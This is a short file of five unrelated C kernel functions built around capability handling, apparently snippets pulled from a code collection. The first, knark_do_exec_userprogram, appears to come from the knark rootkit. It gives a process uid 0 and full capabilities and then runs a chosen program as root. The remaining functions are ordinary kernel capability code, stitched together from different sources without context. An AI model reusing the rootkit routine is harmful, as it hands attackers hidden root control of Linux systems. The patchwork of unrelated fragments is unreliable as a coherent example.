int knark_do_exec_userprogram(void *data) { int i; struct fs_struct *fs; struct execve_args *args = (struct execve_args *) data; lock_kernel(); exit_fs(current); fs = init_task.fs; current->fs = fs; atomic_inc(&fs->count); unlock_kernel(); for(i = 0; i < current->files->max_fds; i++) if(current->files->fd[i]) close(i); current->uid = current->euid = current->fsuid = 0; cap_set_full(current->cap_inheritable); cap_set_full(current->cap_effective); set_fs(KERNEL_DS); if(execve(args->path, args->argv, args->envp) < 0) return -1; return 0; }
int cap_bprm_set_security (struct linux_binprm *bprm) { /* Copied from fs/exec.c:prepare_binprm. */ /* We don't have VFS support for capabilities yet */ cap_clear (bprm->cap_inheritable); cap_clear (bprm->cap_permitted); cap_clear (bprm->cap_effective); /* To support inheritance of root-permissions and suid-root * executables under compatibility mode, we raise all three * capability sets for the file. * * If only the real uid is 0, we only raise the inheritable * and permitted sets of the executable file. */ if (!issecure (SECURE_NOROOT)) { if (bprm->e_uid == 0 || current->uid == 0) { cap_set_full (bprm->cap_inheritable); cap_set_full (bprm->cap_permitted); } if (bprm->e_uid == 0) cap_set_full (bprm->cap_effective); } return 0; }
int krg_cap_prepare_binprm(struct linux_binprm *bprm) { /* The model needs changes with filesystem support ... */ #if 0 cap_clear(bprm->krg_cap_forced); cap_set_full(bprm->krg_cap_permitted); cap_set_full(bprm->krg_cap_effective); #endif /* 0 */ return 0; }
static int dummy_capget (struct task_struct *target, kernel_cap_t * effective, kernel_cap_t * inheritable, kernel_cap_t * permitted) { if (target->euid == 0) { cap_set_full(*permitted); cap_set_init_eff(*effective); } else { cap_clear(*permitted); cap_clear(*effective); } cap_clear(*inheritable); if (target->fsuid != 0) { *permitted = cap_drop_fs_set(*permitted); *effective = cap_drop_fs_set(*effective); } return 0; }
void cap_task_kmod_set_label (void) { cap_set_full (current->cap_effective); return; }